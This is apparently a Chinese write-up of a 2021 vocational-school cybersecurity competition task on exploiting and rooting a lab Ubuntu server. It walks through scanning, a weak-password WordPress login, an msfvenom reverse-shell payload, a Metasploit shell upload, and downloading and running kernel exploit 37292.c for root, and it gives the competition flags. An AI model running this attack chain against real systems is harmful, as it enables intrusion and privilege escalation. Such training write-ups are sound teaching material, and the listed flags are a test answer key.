2021年中职“网络安全“江西省赛题—B-1:系统利用与提权

简介: 2021年中职“网络安全“江西省赛题—B-1:系统利用与提权

B-1:系统利用与提权


任务环境说明:

 服务器场景:PYsystem001

 服务器场景操作系统:Ubuntu(显示链接)

 服务器用户名:未知 密码:未知

  1. 使用nmap扫描靶机系统,将靶机开放的端口号按从小到大的顺序作为FLAG(形式:[端口1,端口…,端口n])提交;


nmap -sV ip 扫描

  1. 通过上述端口访问靶机系统,使用弱口令进行登录,将正确的用户名和密码作为FLAG(形式:[用户名,密码])提交;


通过题目我们知道靶机有网站,我们利用kali中的dirb扫描网站的后台。

优先扫描特殊端口:dirb http://172.16.105.245:8080/

扫描出后台地址,通过题目提示弱口令登录

falg[admin,123456]

4. 利用Kali深入机生成反弹木马,将生成木马命令执行后提示的第四行的首个单词作为FLAG(形式:[单词])提交;

这里固定的falg:[Payload]

命令:Msfvenom -p windows/meterpreter/reverse_tcp lhost=172.16.1.103 lport=8888 -f exe -o shell.exe

5. 对上述木马文件进行修改后上传到靶机系统中,使用MSF开启监听,将获得的当前权限的用户名作为FLAG(形式:[用户名])提交;


我这里没有用这个上传的,我用的是msf中的wp_admin_shell_upload

set rhost 172.16.105.245

set username admin

set password 123456

set targeturi /wordpress


260d7b0907e848ed9e04a790fefa1cc1.png


shell连接后whoami查看权限

falg[daemon]

7. 查看系统内核版本信息,将系统内核版本号作为FLAG(形式:[版本号])提交;


命令:uname -a查看系统内核版本号

falg[3.13.0]

8. 在Kali攻击机中查找可使用的源码,将找到的源码文件名作为FLAG(形式:[文件名])提交;

利用kali中的searchsploit命令查看可使用的源码

命令searchsploit 3.13.0

falg[37292.c]

9. 利用上述源码后获得到的靶机/root下的唯一.txt文件的文件名作为FLAG(形式:[文件名])提交;

把源码复制到kali自带的网站目录下 cp 37292.c /var/www/html/

启动kali的apche服务


使用python切换至交互式shell

命令:python -c ‘import pty;pty.spawn(“/bin/bash”)’

使用命令wget把刚刚上传中37292.c文件下载下来


编译37292.c生成shell文件

运行shell文件,获得root权限

进入root目录查看txt文件名为adftutij.txt

flag[adftutij.txt]


11. 利用源码后将获得到的靶机/root下的唯一.txt文件的文件内容作为FLAG(形式:[文件内容])提交。

cat查看文件内容

flag[hyjufk983]






目录
相关文章
|
5月前
|
Ubuntu 网络协议 网络安全
解决Ubuntu系统的网络连接问题
以上步骤通常可以帮助解决大多数Ubuntu系统的网络连接问题。如果问题仍然存在,可能需要更深入的诊断,或考虑联系网络管理员或专业技术人员。
1170 18
|
5月前
|
监控 安全 网络协议
Cisco Identity Services Engine (ISE) 3.5 发布 - 基于身份的网络访问控制和策略实施系统
Cisco Identity Services Engine (ISE) 3.5 发布 - 基于身份的网络访问控制和策略实施系统
572 1
Cisco Identity Services Engine (ISE) 3.5 发布 - 基于身份的网络访问控制和策略实施系统
|
5月前
|
机器学习/深度学习 大数据 关系型数据库
基于python大数据的青少年网络使用情况分析及预测系统
本研究基于Python大数据技术,构建青少年网络行为分析系统,旨在破解现有防沉迷模式下用户画像模糊、预警滞后等难题。通过整合多平台亿级数据,运用机器学习实现精准行为预测与实时干预,推动数字治理向“数据驱动”转型,为家庭、学校及政府提供科学决策支持,助力青少年健康上网。
|
6月前
|
机器学习/深度学习 传感器 算法
【无人车路径跟踪】基于神经网络的数据驱动迭代学习控制(ILC)算法,用于具有未知模型和重复任务的非线性单输入单输出(SISO)离散时间系统的无人车的路径跟踪(Matlab代码实现)
【无人车路径跟踪】基于神经网络的数据驱动迭代学习控制(ILC)算法,用于具有未知模型和重复任务的非线性单输入单输出(SISO)离散时间系统的无人车的路径跟踪(Matlab代码实现)
405 2
|
7月前
|
安全 KVM 虚拟化
Cisco Identity Services Engine (ISE) 3.4 - 基于身份的网络访问控制和策略实施系统
Cisco Identity Services Engine (ISE) 3.4 - 基于身份的网络访问控制和策略实施系统
390 2
Cisco Identity Services Engine (ISE) 3.4 - 基于身份的网络访问控制和策略实施系统
|
7月前
|
运维 Linux 开发者
Linux系统中使用Python的ping3库进行网络连通性测试
以上步骤展示了如何利用 Python 的 `ping3` 库来检测网络连通性,并且提供了基本错误处理方法以确保程序能够优雅地处理各种意外情形。通过简洁明快、易读易懂、实操性强等特点使得该方法非常适合开发者或系统管理员快速集成至自动化工具链之内进行日常运维任务之需求满足。
463 18
|
5月前
|
机器学习/深度学习 分布式计算 Java
Java与图神经网络:构建企业级知识图谱与智能推理系统
图神经网络(GNN)作为处理非欧几里得数据的前沿技术,正成为企业知识管理和智能推理的核心引擎。本文深入探讨如何在Java生态中构建基于GNN的知识图谱系统,涵盖从图数据建模、GNN模型集成、分布式图计算到实时推理的全流程。通过具体的代码实现和架构设计,展示如何将先进的图神经网络技术融入传统Java企业应用,为构建下一代智能决策系统提供完整解决方案。
512 0
|
7月前
|
机器学习/深度学习 数据采集 算法
【电力系统】MATLAB环境下基于神经网络的电力系统稳定性预测研究(Matlab代码实现)
【电力系统】MATLAB环境下基于神经网络的电力系统稳定性预测研究(Matlab代码实现)
149 1
|
7月前
|
算法 安全 网络安全
【多智能体系统】遭受DoS攻击的网络物理多智能体系统的弹性模型预测控制MPC研究(Simulink仿真实现)
【多智能体系统】遭受DoS攻击的网络物理多智能体系统的弹性模型预测控制MPC研究(Simulink仿真实现)
283 0

热门文章

最新文章